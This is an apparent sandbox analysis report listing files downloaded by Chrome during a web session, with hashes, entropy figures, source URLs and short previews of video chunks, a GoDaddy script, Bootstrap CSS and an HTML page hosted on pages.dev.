                                      SHA-512:37A5EF3872E1E9D8020DCC9345FEC30B58A75A734F235CEB3AC5BF17FCC9F4ABA5EA552DCA0F3B4FB2B5DEC052BD258115E9C676B30CF90945D0512A1B2621C9
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:1
                                      Preview:."s..h.~... ...R8}M..K......4-.../.....n,.v..M.....(Mv.?{...'.L....v.M.....&T:..sy.&L..r./..e.9...m1.....rf...T.r,.w.....IC.j.XZeNv...e..l2u]<..z.\..e...I.Xq..:.Q4....^..5~.0u...$.(......n..D...)..!.....0.pj.*.``..#..-U..#.N/.......I.p0d.*.`...h...)h..BY3..x.]}....w..t...)).....@7ZBN3.J......n...P....lW....i.....z......&....yU.._..!I..Q......z..`.CR....k...O.:....O...e...vIU....&`..kQ.{.U.y.\.8q?@~...W.....0..t....Xn.}..1.O.h......)l..,l...-.b..O.B....O.V....&.Q>p..)?.@%..bl...]........^..k-....#k....#8.4'..7..".....pb.l|K.(R..5q.E...SC.<...M.I....t...:x`Y...9.,R.7x.p$|L}...nPi^..".....a..........hh.*F...gH..HH..I.*.n.v.....A.z..|..0.W.i.#.|k.D..N.><..c\O0Y....i~.b.}..ZR.....X...94....W.c.D?l...T.R).<.R.....[.....~H.TeX.....@.F..0.XhL1..O.8.....^s./.Kc......(s.^].L.Z."...OC.v`.k*....%.....i..w.8..f..P.g?.Y.....l.Z.......eL..q?QiA6(<2..|....Ze.....n..C..X.mn(.<.B...n.| .I.C.;.MG..s.]...9...FY.M..|.%..........x...rK.-..%/...cM..vg..g....
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.9784817226837985
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F4756212B8B75512B397CD69716236BE
                                      SHA1:DE89491A844B730955B50DD584A3362BC479FBCF
                                      SHA-256:A8F382538549A5926F5C0B65FF934635F2E9EE0F78AC46010075F3240631A9C0
                                      SHA-512:8B1C2B386C5BD72851BEF11838CE89349F9122080FEC4836D8D486F6BDA4F65BF5393FA837F370A3126BE1AFE999442312CE85232168DBAD357AFB2CBFFD5853
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:e
                                      Preview:]....~.".8..+..x..*..o(..P_..X.l..*<.$5....0Z.UeqSf.0zDqH...uM(..h..VdVm.v...>a.T..g..}".7.fk.a.t.5^<.%........>.G.. .4{&....h?.yH.9+9..&.z.\XO.i......f...]..X...G!R..`!.?..?...j."..!#=..BL..<..c. /b"/q....-.R&..'..]....t.K`({...h.H^Q..(./k....S`Wr..=.....M,g...Z.V..1..y.......M.+A..o.J.:K.)VX.x.4.g....K...l.%<.....x..ev.7..X}......on.4........tz`....&....,......}Y...K.U%.5.....9..w....q....^.~OS.}MO..'.NJ.....s.?.6.....W|..+|T!.....^i...Y.O....E..5..c.....pg..b.....F...;... Y..P=.@.x..#....*e...*......pqv...=oY&1.j+-..A..."J$9.B....s.n.>x..e0 ;.........b<.U%..#L.....QP....RSj{F<....2o.<...s....`..<.,4........... .U...J...Jw.%0..D..{...Q..G.....u..E.q.+.L.. ].O...P..r.j....8.U.S..z.Cn.W.%>.AF.....|A.B......<W..S....x...;.o.....YTe4..(..v.dC..U.'.FQ......Q..a...$.?..X.T..U..\&......k...........$.m.'A.......q...e...../6.;..Vj.G..i^....\mj=.....J....Y...C]?.8.A.s'G..).0.Y...X.9.R@O..sv#...g..m...f.78.8.k.R.../Q..~.iL....#..G......l..{GpcDvM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (3372), with CRLF, LF line terminators
                                      Category:downloaded
                                      Size (bytes):6616
                                      Entropy (8bit):5.599761125773425
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:107ADE5E870838ED4B64FC69B7159BC8
                                      SHA1:7F5F50E7609AA12C9A26AE829BD40245551599A9
                                      SHA-256:564D8984BB8A35DCB0F163C33A1985CA212E6E63C13C8064A459CD923846734B
                                      SHA-512:C439218698CEAD2608C5C1F05082C0FBADCFD4145A61870D0FD4D9544005B90BF330132D939C719BA5821304F6D7D634E139A67714159B8853BE33C0CDD588D7
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://toungeassociates.pages.dev/favicon.ico
                                      Preview:<html>.... <head>....<meta name="viewport" ..content="width=device-width,.initial-scale=1.0">.. <meta. .name="robots" content="noindex,.nofollow">... <script.src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> .</script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js">. </script>.. <style>.......body.., .html { .height:. 100%;margin:..0;display: .flex;align-items: .center;justify-content: ..center. } @keyframes. bounce.{ 0% ..,. 100%., .12.5% , 32.5% ., 76.1% {.transform:.translateY(0) .}...22.5% ,. .86% . {. transform: .translateY(7px).}.} ..#iamb {. height:. 179px;width:..130px;overflow:..hidden;margin-top:..-59px;margin-left: 25px } @keyframes shadow-fade .{ .0%. .,.. 100%. , . 21.2% , 80%. { opacity: 0 }.47% , ..70%.{ opacity:. 1 } .} #quality.{.. width:. .130px;margin-top:..179px.. } #ululation.{.. width: . 130px;height: .71px;border-radius:..0 0.. 7px.7px;overflow: hidden;margin-top: . -41px. }.#ululation >
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.938832974091078
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:03590D15E8F2E2FC72A4E8450327DFE3
                                      SHA1:235D75702BD000E4C77C57AB23B751B41548A418
                                      SHA-256:F027A326BA4F88697FFFF1878F9A21C7FEADB1C4EA0124302B5CFD0A914E755E
                                      SHA-512:63CF5CA37352B4C939BE1D0048B32AD5E46C209BCADB3C32FE456A955054A29DF0FB821E001E28CA4B10EC53339755C540F5FE697CB8B86E03F16DD8C24B6735
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:1f
                                      Preview:.q..c.....`...Y.9.....7.x.ciI...[Q..dC...=.^....:..m.y...5U......S2im.._....7.(...l...._..*`...p.....FP..]#.1".Q... s...,.]..K...yH./'.W...........,..z..}>...N_.U...7.T.MJs/w....!=uF.Q~!.....t5.[a.......)4..."..7.I~2........0.......B..A..]...........*w....g...d..W.b.[.9.Bj...BO..I..]i..M..cE.l.gN.#t:..1OS..)..o.b.......'...2i..p..S....r..&vC.e...]<.X.....`Qs.P....u.E.f.e .n.6......._...|p.%..%.v.._C2.......-.....m.u..^.@,v..~.1...2...b....u%}=.;..1[g.!.#r..M.......^.H.m.v=.....\..Q.C<..F.ezr>....L 0..L.^.p.f...U...w.S.:...Q..]....e@&.'.&...+.....]G.Ks]&@..^.:...k.m..{....uoF.l.....G...w...B..VI..K.bX.."...K..f....<M.......x..5.T}11_]..P....)7n.S:%;"#..x.f..r..u...08L.I#...}%...Y@#.J>..x...<F..'T_Li3.?.../....).x}...}I.3.U{.!..(u..]..n...(..9.8^...@..7...C6...a........q^..{.2....9...>....N(1Le.TE.?_.I..u...t.v.m.7..m6....!...b..%#m.o..a.Va.......w......L.p.3.WIi..*za..{..d..U".E=...|..Y1|.lU..".1D.......2h.\.iX.n<.$L..Q..}..y.H...l>
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (4451)
                                      Category:downloaded
                                      Size (bytes):4507
                                      Entropy (8bit):5.2603834356899455
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:7E8957E798608B7835B0681550C5AD10
                                      SHA1:51C7EBE582DAC764DB4C1AFAA95A62EAC9261F05
                                      SHA-256:FAEC63FA9BF35E462C000E650B53D7569FCABE5BA8190B27D2A4B7D25B394EEF
                                      SHA-512:44C8DA46DAEB972EE81597079F394E6AB88255F401CF7417EC3A14D7671F8ADE20C1667E63EF892F6CA4D644A400C04FF7C6014DD9926B10EC1BD4034CFFD0D4
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/lib/components/DynamicFontScaler-6cccd626.js
                                      Preview:define("@wsb/guac-widget-shared/lib/components/DynamicFontScaler-6cccd626.js",["exports","~/c/_rollupPluginBabelHelpers","~/c/dynamicFontScaler"],(function(t,e,n){"use strict";function o(t){let e,{containerId:n,targetId:o,fontSizes:r,maxLines:i,prioritizeDefault:s}=t;if("undefined"==typeof document)return;const a=document.getElementById(n),c=document.getElementById(o);function l(t){return function(t){const e=parseInt(y(t,"padding-left")||0,10),n=parseInt(y(t,"padding-right")||0,10);return t.scrollWidth+e+n}(t)<=a.clientWidth&&function(t){const e=t.offsetHeight,n=parseInt(y(t,"line-height"),10)||1;return Math.floor(e/n)}(t)<=i}function p(t){return parseInt(y(t,"font-size")||0,10)}function d(t){if(1===t.length)return t[0];const e=t.filter(l);if(1===e.length)return e[0];if(!e.length)return function(t){return t.sort(((t,e)=>p(t)-p(e)))[0]}(t);return e.sort(((t,e)=>p(e)-p(t)))[0]}function u(){if(!a||!c||e===window.innerWidth)return;if(c.hasAttribute("data-font-scaled"))return void g();e=win
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65342)
                                      Category:downloaded
                                      Size (bytes):232803
                                      Entropy (8bit):4.976199313819095
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A549AF2A81CD9900EE897D8BC9C4B5E9
                                      SHA1:C5AC1DEE961CB59A045256EC203F69E317872F7C
                                      SHA-256:3C8F27E6009CCFD710A905E6DCF12D0EE3C6F2AC7DA05B0572D3E0D12E736FC8
                                      SHA-512:8E74AE0384ACD8F9248A448E2ED62CF0195821E7882B587DF6DCB861FBD13C0973AF7EFBBEBDC25C36FBB1BEDE1040588C3B5C623F808C11F714BBF9B9226E5E
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css
                                      Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.3 (https://getbootstrap.com/). * Copyright 2011-2024 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,
                                      No static file info